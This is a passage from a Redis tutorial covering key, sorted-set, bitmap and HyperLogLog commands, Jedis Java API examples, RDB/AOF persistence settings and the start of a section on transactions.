127.0.0.1:6379> GET k2
"v2"
# Query after more than 3 seconds
127.0.0.1:6379> GET k2
(nil)

6. Find all keys that match the given pattern (pattern)

  • KEYS pattern
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"
127.0.0.1:6379> keys set*
1) "set1"
2) "set5"
3) "set4"
4) "set2"
127.0.0.1:6379> keys *1
1) "L1"
2) "set1"
3) "l1"

7. Remove the key's expiration time so that the key is kept permanently.

  • PERSIST key
127.0.0.1:6379> SET k1 v1
OK
127.0.0.1:6379> EXPIRE k1 15
(integer) 1
# Run PERSIST before the key expires to remove the expiration
127.0.0.1:6379> PERSIST k1
(integer) 1
# Still retrievable after waiting more than 15 seconds
127.0.0.1:6379> GET k1
"v1"

8. Return the remaining expiration time of the key in milliseconds

  • PTTL key
127.0.0.1:6379> EXPIRE k1 30
(integer) 1
127.0.0.1:6379> PTTL k1
(integer) 23007
127.0.0.1:6379> PTTL k1
(integer) 17000

9. Return the remaining survival time of the given key in seconds.

  • TTL key
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> EXPIRE k1 30
(integer) 1
127.0.0.1:6379> TTL k1
(integer) 24
127.0.0.1:6379> TTL k1
(integer) 17

10. Randomly return a key from the current database

  • RANDOMKEY
127.0.0.1:6379> keys *
1) "L1"
2) "set1"
3) "set5"
4) "set4"
5) "set2"
6) "l1"
127.0.0.1:6379> RANDOMKEY
"l1"
127.0.0.1:6379> RANDOMKEY
"set1"
127.0.0.1:6379> RANDOMKEY
"set4"

11. Modify the name of the key

  • RENAME key newkey
127.0.0.1:6379> SET k1 v1
OK
127.0.0.1:6379> GET k1
"v1"
127.0.0.1:6379> RENAME k1 kkkkk1
OK
127.0.0.1:6379> GET k1
(nil)
127.0.0.1:6379> GET kkkkk1
"v1"

12. Only when newkey does not exist, rename the key to newkey

  • RENAMENX key newkey
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> renamenx k1 k2
(integer) 0
127.0.0.1:6379> get k1 
"v1"
127.0.0.1:6379> get k2
"v2"
127.0.0.1:6379> renamenx k1 k3
(integer) 1
127.0.0.1:6379> get k3
"v1"

13. Return the type of value stored in key

  • TYPE key
127.0.0.1:6379> keys *
1) "kkkkk1"
2) "k3"
3) "set2"
4) "set5"
5) "L1"
6) "set1"
7) "k2"
8) "set4"
9) "l1"
127.0.0.1:6379> 
127.0.0.1:6379> TYPE k2
string
127.0.0.1:6379> TYPE l1
list
127.0.0.1:6379> TYPE set1
set

14. Clear all keys

  • FLUSHALL

Use with caution: this is equivalent to dropping the database in MySQL

Type 5: zset (sorted set) operations

  • Redis sorted sets, like sets, are collections of string elements that do not allow duplicate members
  • They are used to store data that needs sorting, such as rankings, a class's Chinese scores, a company's employee salaries, forum posts, etc.
  • In a sorted set, each element has a score (weight) used to order the elements
  • It involves three things: key, member, and score. Taking Chinese scores as an example, the key is the exam name (midterm, final, etc.), the member is the student's name, and the score is the score

1. Add one or more members to an ordered set, or update the score of an existing member

  • ZADD key score1 member1 [score2 member2]
127.0.0.1:6379> ZADD pv_zset 80 page1.html 100 page2.html 160 page3.html
(integer) 3

2. Get the number of members of an ordered set

  • ZCARD key
127.0.0.1:6379> ZCARD pv_zset
(integer) 3

3. Calculate the number of members with a specified interval score in an ordered set

  • ZCOUNT key min max
# 80  page1.html
# 100 page2.html
# 160 page3.html
# between 60 and 110: 2 members
127.0.0.1:6379> ZCOUNT pv_zset 60 110
(integer) 2

4. Add increment to the score of the specified member in the ordered set

  • ZINCRBY key increment member
127.0.0.1:6379> ZINCRBY pv_zset 10 page1.html
"90"

5. Calculate the intersection of the given sorted sets and store the result in a new sorted set at destination (by default, a member's scores are summed across the input sets)

  • ZINTERSTORE destination numkeys key [key …]
127.0.0.1:6379> ZADD pv_zset1 10 page1.html 20 page2.html
(integer) 2
127.0.0.1:6379> ZADD pv_zset2 5 page1.html 10 page2.html
(integer) 2
127.0.0.1:6379> ZINTERSTORE pv_zset_result 2 pv_zset1 pv_zset2
(integer) 2

6. Return the members in the specified range of the ordered set through the index range

  • ZRANGE key start stop [WITHSCORES]
127.0.0.1:6379> ZRANGE pv_zset_result 0 -1 WITHSCORES
1) "page1.html"
2) "15"
3) "page2.html"
4) "30"

7. Return the members in the specified interval of the ordered set through scores

  • ZRANGEBYSCORE key min max [WITHSCORES] [LIMIT]
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page1.html"
2) "90"
3) "page2.html"
4) "100"
5) "page3.html"
6) "160"
127.0.0.1:6379> ZRANGEBYSCORE pv_zset 95 180
1) "page2.html"
2) "page3.html"

8. Return the index of the specified member in the ordered set

  • ZRANK key member
127.0.0.1:6379> ZRANK pv_zset page1.html
(integer) 0
127.0.0.1:6379> ZRANK pv_zset page3.html
(integer) 2

9. Remove one or more members from an ordered set

  • ZREM key member [member …]
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page1.html"
2) "90"
3) "page2.html"
4) "100"
5) "page3.html"
6) "160"
127.0.0.1:6379> ZREM pv_zset page1.html
(integer) 1
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
1) "page2.html"
2) "100"
3) "page3.html"
4) "160"

10. Return the members in the specified range of the sorted set, by index, with scores ordered from high to low

  • ZREVRANGE key start stop [WITHSCORES]
127.0.0.1:6379> ZADD pv_zset 120 page1.html 140 page4.html 20 page5.html 300 page6.html
(integer) 4
127.0.0.1:6379> ZRANGE pv_zset 0 -1 WITHSCORES
 1) "page5.html"
 2) "20"
 3) "page2.html"
 4) "100"
 5) "page1.html"
 6) "120"
 7) "page4.html"
 8) "140"
 9) "page3.html"
10) "160"
11) "page6.html"
12) "300"
127.0.0.1:6379> ZREVRANGE pv_zset 0 -1
1) "page6.html"
2) "page3.html"
3) "page4.html"
4) "page1.html"
5) "page2.html"
6) "page5.html"

11. Return the rank of the specified member in the sorted set, with members ordered by decreasing score (from largest to smallest)

  • ZREVRANK key member
# ranking starts at 0
127.0.0.1:6379> ZREVRANK pv_zset page6.html
(integer) 0
127.0.0.1:6379> ZREVRANK pv_zset page4.html
(integer) 2
127.0.0.1:6379> ZREVRANK pv_zset page5.html
(integer) 5

12. Return the score value of the member in the ordered set

  • ZSCORE key member
127.0.0.1:6379> ZSCORE pv_zset page3.html
"160"
127.0.0.1:6379> ZSCORE pv_zset page5.html
"20"

Bitmap operations

  • The smallest storage unit in a computer is the bit. Bitmaps operate on bits and save more space than String, Hash, Set, and other storage methods.
  • Bitmaps are not a separate data structure; the operations work on the String type. A String can store up to 512 MB, so a Bitmap can set 2^32 bits.
  • Bitmaps provide a separate set of commands, so using Bitmaps in Redis is not the same as using strings. Think of a Bitmap as an array of bits, where each cell can only store 0 or 1; the array index is called the offset.
  • An example of the Bitmaps commands: store in a Bitmap whether each individual user has visited the website, recording visitors as 1 and non-visitors as 0, with the offset used as the user ID

1. Set a bit value

  • SETBIT key offset value

The value set by the SETBIT command can only be 0 or 1.

127.0.0.1:6379> setbit unique:users:2022-09-12 1 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 2 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 3 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-12 4 0
(integer) 0
# unique:users:2022-09-12 -> per-day visit flags for users
# 1,2,3,4 can be user IDs or similar identifiers
# 1 means the user visited; 0 means not visited

2. Get the Bit value

  • GETBIT key offset
127.0.0.1:6379> getbit unique:users:2022-09-12 3
(integer) 1
127.0.0.1:6379> getbit unique:users:2022-09-12 4
(integer) 0

3. Count the bits set to 1 within a specified range

  • BITCOUNT key [start end]

Even with a lot of data, counting which users visited that day only requires counting the total number of 1 bits

127.0.0.1:6379> bitcount unique:users:2022-09-12
(integer) 3

4. Operations between Bitmaps

  • BITOP operation destkey key [key …]
127.0.0.1:6379> setbit unique:users:2022-09-13 1 0
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 2 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 3 1
(integer) 0
127.0.0.1:6379> setbit unique:users:2022-09-13 4 1
(integer) 0
# 2022-09-12 1 1
# 2022-09-12 2 1  **
# 2022-09-12 3 1  **
# 2022-09-12 4 0

# 2022-09-13 1 0
# 2022-09-13 2 1  **
# 2022-09-13 3 1  **
# 2022-09-13 4 1
# count the users marked 1 on both days (result: 2)
127.0.0.1:6379> bitop and unique:users:and:2022-09-12and13 unique:users:2022-09-12 unique:users:2022-09-13
(integer) 1
127.0.0.1:6379> bitcount unique:users:and:2022-09-12and13
(integer) 2
# count the users marked 1 on at least one of the two days (result: 4)
127.0.0.1:6379> bitop or unique:users:or:2022-09-12or13 unique:users:2022-09-12 unique:users:2022-09-13
(integer) 1
127.0.0.1:6379> bitcount unique:users:or:2022-09-12or13
(integer) 4

Operations on HyperLogLog structure

HyperLogLog is often used for statistics of large amounts of data, such as page visit statistics or user visit statistics.

The HyperLogLog syntax integrated in Redis mainly consists of PFADD and PFCOUNT: as the names suggest, one adds data and the other counts it. Why the pf prefix? Because the HyperLogLog data structure was invented by Professor Philippe Flajolet, the commands use the inventor's initials.

  • pfadd
  • pfcount
    • pfadd and pfcount are commonly used in statistics
127.0.0.1:6379> pfadd uv user1
(integer) 1
127.0.0.1:6379> keys *
1) "uv"
127.0.0.1:6379> pfcount uv
(integer) 1
127.0.0.1:6379> pfadd uv user2
(integer) 1
127.0.0.1:6379> pfadd uv user3
(integer) 1
127.0.0.1:6379> pfadd uv user4
(integer) 1
127.0.0.1:6379> pfcount uv
(integer) 4
127.0.0.1:6379> pfadd uv user5 user6 user7 user8 user9 user10
(integer) 1
127.0.0.1:6379> pfcount uv
(integer) 10
127.0.0.1:6379> pfadd page1 user1 user2 user3 user4 user5
(integer) 1
127.0.0.1:6379> pfadd page2 user1 user2 user3 user6 user7
(integer) 1
127.0.0.1:6379> pfmerge page1+page2 page1 page2
OK
127.0.0.1:6379> pfcount page1+page2
(integer) 7

Why HyperLogLog is suitable for statistics of large amounts of data

  • Redis HyperLogLog is an algorithm for cardinality statistics. Its advantage is that even when the number or volume of input elements is very large, the space needed to compute the cardinality is fixed and very small.
  • In Redis, each HyperLogLog key needs only 12 KB of memory to count the cardinality of nearly 2^64 distinct elements. This contrasts sharply with sets, which consume more memory the more elements they hold.
  • Because HyperLogLog computes the cardinality from the input elements without storing the elements themselves, it cannot return the individual input elements the way a set can.

What is cardinality?

For example: for the data set {1, 3, 5, 7, 5, 7, 8}, the cardinality set is {1, 3, 5, 7, 8} and the cardinality is 5 (the number of distinct elements). Cardinality estimation means quickly computing the cardinality within an acceptable error range.

[Chapter 5]-Redis Java API development operations

Redis can be operated not only through the command line but also through a Java API, which can manipulate all of the data types in a Redis database.

Development environment preparation

Create a maven project to configure pom dependencies

groupId

  • cn.wangting

artifactId

  • redis_op

pom configuration file

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>cn.wangting</groupId>
    <artifactId>redis_op</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>redis.clients</groupId>
            <artifactId>jedis</artifactId>
            <version>2.9.0</version>
        </dependency>
        <dependency>
            <groupId>junit</groupId>
            <artifactId>junit</artifactId>
            <version>4.12</version>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>org.testng</groupId>
            <artifactId>testng</artifactId>
            <version>6.14.3</version>
            <scope>test</scope>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.0</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                    <encoding>UTF-8</encoding>
                    <!--    <verbal>true</verbal>-->
                </configuration>
            </plugin>
        </plugins>
    </build>
    
</project>

Create packages and experimental classes

Create cn.wangting.redis.api_test package structure in the test directory
and create the RedisTest class

Because the subsequent tests frequently need Redis connections, we first create a JedisPool to obtain them. The various APIs are tested with TestNG: @BeforeTest creates the Redis connection pool before the test cases execute, and @AfterTest closes the pool after they finish.

Implementation steps:

  1. Create a JedisPoolConfig configuration object specifying at most 10 idle connections, a maximum wait of 3000 milliseconds, at most 50 total connections, and at least 5 idle connections.

  2. Create JedisPool

  3. Use the @Test annotation to write test cases and view all keys in Redis

    • Get Redis connection from Redis connection pool
    • Call the keys method to get all keys
    • Traverse and print all keys

RedisTest

package cn.wangting.redis.api_test;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Set;


public class RedisTest {

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
        // Pool settings: max 10 idle, 3000 ms max wait, 50 max total, min 5 idle
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // Functional smoke test
    public static void main(String[] args) {
        System.out.println("hello redis!");
    }

    @AfterTest
    public void closePool(){
        jedisPool.close();
    }

}

Run it; if the console prints hello redis!, the environment is ready.

API operates string type data

Implement the following requirements through API operations:

  1. Add a string-type key pv to hold the PV value, initialized to 0

  2. Query the data for that key

  3. Change pv to 1000

  4. Atomically increment the integer value by 1

  5. Atomically increment the integer value by 1000

Current Redis state on the command line

[root@wangting ~]# redis-cli 
127.0.0.1:6379> keys *
1) "a"
2) "c"
127.0.0.1:6379> 

string operation code RedisTest

package cn.wangting.redis.api_test;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Set;


public class RedisTest {

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // Functional test
    @Test
    public void stringOpTest() {
        Jedis connection = jedisPool.getResource();
        // 1. Add the data
        connection.set("pv", "0");

        // 2. Query the data
        System.out.println("initial pv: " + connection.get("pv"));

        // 3. Modify the data
        connection.set("pv", "1000");
        System.out.println("pv after update: " + connection.get("pv"));

        // 4. Atomically increment the integer value by 1
        connection.incr("pv");
        System.out.println("pv after incr 1: " + connection.get("pv"));

        // 5. Atomically increment the integer value by 1000
        connection.incrBy("pv", 1000);
        System.out.println("pv after incrBy 1000: " + connection.get("pv"));

    }

    @AfterTest
    public void closePool(){
        jedisPool.close();
    }

}

[Note]: To keep the length down, only the relevant @Test code blocks are shown from here on.

Console output:

initial pv: 0
pv after update: 1000
pv after incr 1: 1001
pv after incrBy 1000: 2001

===============================================
Default Suite
Total tests run: 1, Failures: 0, Skips: 0
===============================================

Check the Redis state on the command line again

127.0.0.1:6379> keys *
1) "a"
2) "pv"
3) "c"
127.0.0.1:6379> get pv
"2001"

API operates hash type data

Implement the following requirements through API operations:

  1. Add the following product inventory to the Hash structure

    • iphone11 => 10000
    • macbookpro => 9000
  2. Get all products in Hash

  3. Add 3,000 to the macbookpro inventory

  4. Delete the entire Hash data

Check the Redis state from the command line

127.0.0.1:6379> keys *
(empty array)
@Test
public void hashOpTest() {
    Jedis connection = jedisPool.getResource();

    // 1. Add the product inventory to the hash
    connection.hset("goodsStore", "iphone11", "10000");
    connection.hset("goodsStore", "macbookpro", "9000");

    // 2. Get all products in the hash
    Map<String, String> keyValues = connection.hgetAll("goodsStore");
    for (String s : keyValues.keySet()) {
        System.out.println(s + " => " + keyValues.get(s));
    }
}

Check the Redis state from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
127.0.0.1:6379> HGETALL goodsStore
1) "iphone11"
2) "10000"
3) "macbookpro"
4) "9000"

API operates list type data

Implement the following requirements through API operations:

  1. Insert the following three mobile phone numbers to the left of the list: 13844556677, 13644556677, 13444556677

  2. Remove a mobile number from the right

  3. Get all values ​​of list

Check the Redis state from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
127.0.0.1:6379> 
@Test
public void listOpTest() {
    Jedis connection = jedisPool.getResource();
    // 1. Insert the three phone numbers at the left of the list: 13844556677, 13644556677, 13444556677
    connection.lpush("telephone", "13844556677", "13644556677", "13444556677");

    // 2. Remove one phone number from the right
    connection.rpop("telephone");

    // 3. Get all values of the list
    List<String> telList = connection.lrange("telephone", 0, -1);
    for (String tel : telList) {
        System.out.print(tel + " ");
    }
}

Check the Redis state from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "telephone"
127.0.0.1:6379> LRANGE telephone 0 -1
1) "13444556677"
2) "13644556677"
127.0.0.1:6379> 

API operates set type data

Implement the following requirements through API operations:

  1. Add page page1's UV to a set: user user1 visits the page once.

  2. user2 visits this page once

  3. user1 visits the page again

  4. Finally get the uv value of page1

Check the Redis state from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "telephone"
127.0.0.1:6379> 
@Test
public void setOpTest() {
    Jedis connection = jedisPool.getResource();

    // 1. Add page1's UV to a set: user1 visits the page once
    connection.sadd("page1", "user1");

    // 2. user2 visits the page once
    connection.sadd("page1", "user2");

    // 3. user1 visits the page again
    connection.sadd("page1", "user1");

    // 4. Finally, get page1's UV value
    Long uv = connection.scard("page1");
    System.out.println("UV of page1: " + uv);
}

Check the Redis state from the command line

127.0.0.1:6379> keys *
1) "goodsStore"
2) "page1"
3) "telephone"
127.0.0.1:6379> SMEMBERS page1
1) "user2"
2) "user1"
127.0.0.1:6379> 

Complete code:

package cn.wangting.redis.api_test;
import org.testng.annotations.AfterTest;
import org.testng.annotations.BeforeTest;
import org.testng.annotations.Test;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.JedisPool;
import redis.clients.jedis.JedisPoolConfig;
import java.util.List;
import java.util.Map;
import java.util.Set;

public class RedisTest {

    private JedisPool jedisPool;
    private JedisPoolConfig config;

    @BeforeTest
    public void redisConnectionPool(){
        config = new JedisPoolConfig();
        config.setMaxIdle(10);
        config.setMaxWaitMillis(3000);
        config.setMaxTotal(50);
        config.setMinIdle(5);
        jedisPool = new JedisPool(config, "8.130.25.36", 6379);
    }

    // Functional tests
    @Test
    public void stringOpTest() {
        Jedis connection = jedisPool.getResource();
        // 1. Add a string-type key pv with initial value 0
        connection.set("pv", "0");

        // 2. Query the data for that key
        System.out.println("initial pv: " + connection.get("pv"));

        // 3. Change pv to 1000
        connection.set("pv", "1000");
        System.out.println("pv after update: " + connection.get("pv"));

        // 4. Atomically increment the integer value by 1
        connection.incr("pv");
        System.out.println("pv after incr 1: " + connection.get("pv"));

        // 5. Atomically increment the integer value by 1000
        connection.incrBy("pv", 1000);
        System.out.println("pv after incrBy 1000: " + connection.get("pv"));
    }

    @Test
    public void hashOpTest() {
        Jedis connection = jedisPool.getResource();

        // 1. Add the product inventory to the hash
        connection.hset("goodsStore", "iphone11", "10000");
        connection.hset("goodsStore", "macbookpro", "9000");

        // 2. Get all products in the hash
        Map<String, String> keyValues = connection.hgetAll("goodsStore");
        for (String s : keyValues.keySet()) {
            System.out.println(s + " => " + keyValues.get(s));
        }
    }

    @Test
    public void listOpTest() {
        Jedis connection = jedisPool.getResource();
        // 1. Insert the three phone numbers at the left of the list: 13844556677, 13644556677, 13444556677
        connection.lpush("telephone", "13844556677", "13644556677", "13444556677");

        // 2. Remove one phone number from the right
        connection.rpop("telephone");

        // 3. Get all values of the list
        List<String> telList = connection.lrange("telephone", 0, -1);
        for (String tel : telList) {
            System.out.print(tel + " ");
        }
    }

    @Test
    public void setOpTest() {
        Jedis connection = jedisPool.getResource();

        // 1. Add page1's UV to a set: user1 visits the page once
        connection.sadd("page1", "user1");

        // 2. user2 visits the page once
        connection.sadd("page1", "user2");

        // 3. user1 visits the page again
        connection.sadd("page1", "user1");

        // 4. Finally, get page1's UV value
        Long uv = connection.scard("page1");
        System.out.println("UV of page1: " + uv);
    }

    @AfterTest
    public void closePool(){
        jedisPool.close();
    }
}

[Chapter 6]-Redis data persistence

RDB persistence

Introduction to RDB persistence

Redis periodically saves data snapshots to an RDB file and automatically loads that file at startup to restore the previously saved data. The snapshot timing can be configured in the configuration file:

# save [seconds] [changes]
# Meaning: if at least `changes` data modifications occur within `seconds` seconds, take an RDB snapshot

save 60 100
# Makes Redis check for data changes every 60 seconds; if 100 or more changes have occurred, an RDB snapshot is saved

  • Multiple save directives can be configured so that Redis applies a multi-level snapshot strategy.

  • Redis enables RDB snapshots by default

  • You can also trigger an RDB snapshot manually with the SAVE or BGSAVE command (see the example after this list).

  • Both SAVE and BGSAVE call the rdbSave function, but they call it in different ways.

    • SAVE calls rdbSave directly, blocking the main Redis process until the save completes. While the main process is blocked, the server cannot handle any client requests.
    • BGSAVE forks a child process that calls rdbSave and signals the main process once the save completes. The Redis server can continue handling client requests while BGSAVE executes.
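
A quick way to trigger and verify a snapshot by hand (LASTSAVE returns the Unix timestamp of the last successful save; the timestamps below are illustrative):

127.0.0.1:6379> LASTSAVE
(integer) 1663050000
127.0.0.1:6379> BGSAVE
Background saving started
127.0.0.1:6379> LASTSAVE
(integer) 1663050123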

RDB persistence advantages

  1. Minimal performance impact. Redis forks a child process to save RDB snapshots, which barely affects Redis's handling of client requests.

  2. Each snapshot produces a complete data snapshot file, so snapshots from multiple points in time can be kept by other means (such as backing up the 0:00 snapshot to other storage media every day) as a very reliable disaster-recovery mechanism.

  3. Data recovery using RDB files is much faster than using AOF

Disadvantages of RDB persistence

  1. Snapshots are generated periodically, so some data written since the last snapshot will inevitably be lost if Redis crashes.

  2. If the data set is very large and the CPU is weak (such as a single-core CPU), forking the child process may take relatively long, affecting Redis's ability to serve requests.

RDB persistence configuration

View the redis configuration file redis.conf

[root@wangting redis]# vim redis.conf
dir /var/lib/redis
save 900 1
save 300 10
save 60 10000

As you can see, the redis configuration file ships with three snapshot rules by default.

Backup file:

[root@wangting redis]# ll /root/redis/data/
total 4
-rw-r--r-- 1 redis redis 215 Sep 13 14:41 dump.rdb

AOF persistence

Introduction to AOF persistence

With AOF persistence, Redis records every write request in a log file. When Redis restarts, all write operations recorded in the AOF file are executed in order, ensuring the data is restored to its latest state

AOF persistence advantages

  1. The safest option. With appendfsync always, no written data is lost; with appendfsync everysec, at most 1 second of data is lost.

  2. AOF files are not corrupted by events such as power failures; even if a log entry is only half written, it is easy to repair with the redis-check-aof tool.

  3. AOF files are readable and can be edited. If some erroneous data-clearing operations were executed, then as long as the AOF file has not been rewritten, you can back it up, delete the erroneous commands, and restore the data.

AOF persistence disadvantages

  1. AOF files are generally larger than RDB files

  2. Performance consumption is higher than RDB

  3. Data recovery is slower than RDB

Redis's data persistence itself introduces latency, so a persistence strategy should be chosen based on the data's safety requirements and the performance needed:

  • Although AOF + fsync always absolutely guarantees data safety, every operation triggers an fsync, which significantly impacts Redis performance.

  • AOF + fsync every second is a better compromise, fsync once per second

  • AOF + fsync never will provide the best performance under the AOF persistence solution

Using RDB persistence usually provides higher performance than using AOF, but you need to pay attention to the policy configuration of RDB

AOF persistence turned on

Redis enables RDB by default but leaves AOF off. To enable AOF, set the following in the configuration file:

appendonly yes

AOF persistence configuration

appendfilename "appendonly.aof"
appendfsync everysec

AOF provides three fsync policies, always/everysec/no, selected via the configuration item [appendfsync] (they can also be changed at runtime, as sketched after this list):

  1. appendfsync no : No fsync is performed, and the timing of flushing the file is left to the OS to decide, which is the fastest.

  2. appendfsync always : perform an fsync operation every time a log is written, with the highest data security but the slowest speed

  3. appendfsync everysec : A compromise approach, leaving it to the background thread to fsync once per second
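As an aside, the fsync policy can also be read or changed at runtime via CONFIG GET/SET. A minimal Jedis sketch, assuming a local instance on 127.0.0.1:6379 (class name is illustrative); note that a change made this way is not persisted unless redis.conf is edited or CONFIG REWRITE is issued:

import java.util.List;
import redis.clients.jedis.Jedis;

public class AppendfsyncDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            jedis.configSet("appendfsync", "everysec");      // the usual compromise setting
            List<String> v = jedis.configGet("appendfsync"); // [appendfsync, everysec]
            System.out.println(v);
        }
    }
}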

After editing the configuration, restart Redis and write a few test keys:

[root@wangting redis]# redis-cli 
127.0.0.1:6379> set k1 v1
OK
127.0.0.1:6379> set k2 v2
OK
127.0.0.1:6379> set k3 v3
OK
127.0.0.1:6379> exit

View the appendonly.aof file

[root@wangting redis]# ll /root/redis/data
total 8
-rw-r--r-- 1 redis redis 110 Sep 13 15:40 appendonly.aof
-rw-r--r-- 1 redis redis 118 Sep 13 15:40 dump.rdb
[root@wangting redis]# cat appendonly.aof 
*2
$6
SELECT
$1
0
*3
$3
set
$2
k1
$2
v1
*3
$3
set
$2
k2
$2
v2
*3
$3
set
$2
k3
$2
v3

Unlike the binary dump.rdb file, the contents of appendonly.aof are plain text and can be inspected directly.

AOF persistence rewrite

As AOF keeps recording write operations, useless entries inevitably accumulate (for example, a key that is set and later deleted). An oversized AOF file makes data recovery take too long. Redis therefore provides an AOF rewrite feature that compacts the file, retaining only the minimal set of write commands needed to restore the data to its latest state.

AOF rewrite can be triggered by the BGREWRITEAOF command, or Redis can be configured to do it automatically on a regular basis:

auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
  • auto-aof-rewrite-percentage: each time a rewrite finishes, Redis records the resulting AOF size as a baseline; when the file grows by 100% beyond that baseline, another rewrite is triggered automatically (a programmatic trigger is sketched below).

  • auto-aof-rewrite-min-size: the AOF file must reach at least this size before an automatic rewrite is considered; it mainly prevents frequent rewrites while the file is still small.
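A rewrite can also be requested programmatically with BGREWRITEAOF; a minimal Jedis sketch, assuming a local instance (class name is illustrative):

import redis.clients.jedis.Jedis;

public class AofRewriteDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            // Ask Redis to compact the AOF in a forked child process
            System.out.println(jedis.bgrewriteaof()); // "Background append only file rewriting started"
        }
    }
}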

Redis fork operation

Every RDB snapshot and AOF rewrite requires the Redis main process to perform a fork. The fork itself can take a long time, depending on CPU speed and the amount of memory the Redis instance occupies. Configure RDB snapshot and AOF rewrite timing sensibly for the workload, so that overly frequent forks do not introduce latency.

When Redis forks a child process, it must copy the memory page table to the child. For a Redis instance occupying 24 GB of memory, roughly 48 MB of page-table data has to be copied.
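To gauge this cost on a running instance, the stats section of INFO exposes latest_fork_usec, the duration of the most recent fork in microseconds. A minimal Jedis sketch, assuming a local instance (class name is illustrative):

import redis.clients.jedis.Jedis;

public class ForkCostDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            // INFO stats exposes latest_fork_usec: duration of the last fork in microseconds
            for (String line : jedis.info("stats").split("\r\n")) {
                if (line.startsWith("latest_fork_usec")) {
                    System.out.println(line); // e.g. latest_fork_usec:1234
                }
            }
        }
    }
}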

[Chapter 7]-Advanced use of Redis

Redis transaction

Introduction to Redis transactions

The essence of a Redis transaction is a collection of commands. Transactions support executing multiple commands at one time, and all commands in a transaction will be serialized. During the transaction execution process, the commands in the queue will be executed serially in order, and command requests submitted by other clients will not be inserted into the transaction execution command sequence.

A Redis transaction is a one-time, sequential, and exclusive execution of a series of commands in a queue.

  • Redis transactions have no concept of isolation level
    • Commands issued after MULTI are queued and not actually executed until EXEC, so a query inside the transaction cannot see the transaction's own pending updates, and queries from outside the transaction cannot see them either.
  • Redis does not guarantee atomicity
    • In Redis, a single command is executed atomically, but transactions are not guaranteed to be atomic and there is no rollback. If any command in the transaction fails to execute, the remaining commands will still be executed.

A transaction will go through the following three stages from start to execution:

  • Phase 1: the transaction is started (MULTI)

  • Phase 2: the commands are queued

  • Phase 3: the transaction is executed (EXEC)

Redis transaction related commands:

  • MULTI

Starts a transaction. Redis queues each subsequent command one by one until the EXEC command executes the whole queue atomically.

  • EXEC

Execute all operation commands in the transaction

  • DISCARD

Cancel the transaction and abandon execution of all commands in the transaction block

  • WATCH

Monitors one or more keys. If any watched key is modified by another command before the transaction executes, the transaction is aborted and none of its commands run (see the Jedis sketch after this command list).

  • UNWATCH

Cancel WATCH monitoring of all keys
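Putting these commands together, below is a minimal Jedis sketch of optimistic locking with WATCH/MULTI/EXEC. The key name, amounts, and connection details are illustrative, and it assumes the Jedis behavior where exec() returns null when a watched key was modified and the transaction aborted:

import java.util.List;
import redis.clients.jedis.Jedis;
import redis.clients.jedis.Transaction;

public class WatchDemo {
    public static void main(String[] args) {
        try (Jedis jedis = new Jedis("127.0.0.1", 6379)) {
            jedis.set("balance", "100");
            jedis.watch("balance");                       // abort if balance changes before EXEC
            int balance = Integer.parseInt(jedis.get("balance"));
            Transaction tx = jedis.multi();               // start queuing commands
            tx.set("balance", String.valueOf(balance - 30));
            List<Object> results = tx.exec();             // null if the watched key was modified
            if (results == null) {
                System.out.println("balance changed concurrently, transaction aborted");
            } else {
                System.out.println("new balance: " + jedis.get("balance"));
            }
        }
    }
}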

Redis transaction operations
  • Start transaction operation
# MULTI starts a transaction: set k1 and k2, modify both inside the transaction; after EXEC, both values are updated
127.0.0.1:6379> FLUSHALL
OK
127.0.0.1:6379> keys *
(empty array)
